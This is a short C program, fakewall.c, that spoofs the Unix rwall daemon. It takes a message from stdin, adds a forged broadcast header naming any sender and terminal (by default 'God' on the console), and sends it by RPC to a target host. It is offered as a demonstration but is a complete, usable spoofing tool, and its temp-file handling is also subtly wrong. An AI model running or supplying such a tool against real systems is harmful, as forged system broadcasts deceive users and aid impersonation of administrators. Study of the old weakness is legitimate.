/* fakewall.c */
/* John (lgas@cs.umd.edu) */

/* I don't really believe in disclaimers but for the record this file is  */
/* to demonstrate what some might consider a security hole, and is not    */
/* intended to be used maliciously, but whatever you do with it is up to  */
/* you, not me. */

/* This program demonstrates spoofing of the rwall daemon */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <sys/param.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <pwd.h>
#include <unistd.h>

#include <rpc/rpc.h>
#include <rpcsvc/rwall.h>

#define DEFAULTNAME "God"

void makemsg ();

  struct timeval timeout = { 25, 0 };
int main(argc, argv)
  int argc;
  char **argv;
{
  char *wallhost, res;
  CLIENT *cl;

  int mbufsize;
  char *mbuf;
  struct tm *lt;
  struct passwd *pw;
  struct stat sbuf;
  time_t now;
  FILE *fp;
  int fd;
  char lbuf[100], tmpname[32];

  if ((argc < 2) || (argc > 4)) {
    fprintf(stderr, "usage: %s [hostname] <username> <tty>\n", argv[0]);
    exit(1);
  }

  wallhost = argv[1];

  (void)strcpy(tmpname, "./fakewall.tmp.xyzzy");
  if (!(fd = mkstemp(tmpname)) || !(fp = fdopen(fd, "r+"))) {
    (void)fprintf(stderr, "wall: can't open temporary file.\n");
    exit(1);
  }
  (void)unlink(tmpname);

  (void)time(&now);
  lt = localtime(&now);
  
  if (argc<3) 
    (void)fprintf(fp, "Broadcast Message from God");
  else
    (void)fprintf(fp, "Broadcast Message from %s",argv[2]);
  if (argc<4)
    (void)fprintf(fp, " (console) at %d:%02d ...\n", lt->tm_hour, lt->tm_min);
  else
    (void)fprintf(fp, " (%s) at %d:%02d ...\n", argv[3],lt->tm_hour, lt->tm_min);

  putc('\n', fp);

  while (fgets(lbuf, sizeof(lbuf), stdin))
    fputs(lbuf, fp);

  rewind(fp);

  if (fstat(fd, &sbuf)) {
    (void)fprintf(stderr, "wall: can't stat temporary file.\n");
    exit(1);
  }

  mbufsize = sbuf.st_size;

  if (!(mbuf = malloc((u_int)mbufsize))) {
    (void)fprintf(stderr, "wall: out of memory.\n");
    exit(1);
  }

  if (fread(mbuf, sizeof(*mbuf), mbufsize, fp) != mbufsize) {
    (void)fprintf(stderr, "wall: can't read temporary file.\n");
    exit(1);
  }

  (void)close(fd);
  
  cl = clnt_create(wallhost, WALLPROG, WALLVERS, "udp");
  if (cl == NULL) {
    clnt_pcreateerror(wallhost);
    exit(1);
  }

  if (clnt_call(cl, WALLPROC_WALL, xdr_wrapstring, &mbuf, xdr_void, &res,
      timeout) != RPC_SUCCESS) {
    clnt_perror(cl, wallhost);
    exit(1);
  }

  exit(0);
}
